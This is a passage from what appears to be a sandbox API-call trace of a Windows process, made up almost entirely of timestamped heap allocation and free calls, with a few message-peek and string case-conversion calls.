lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0161.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.853] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0161.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0161.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: 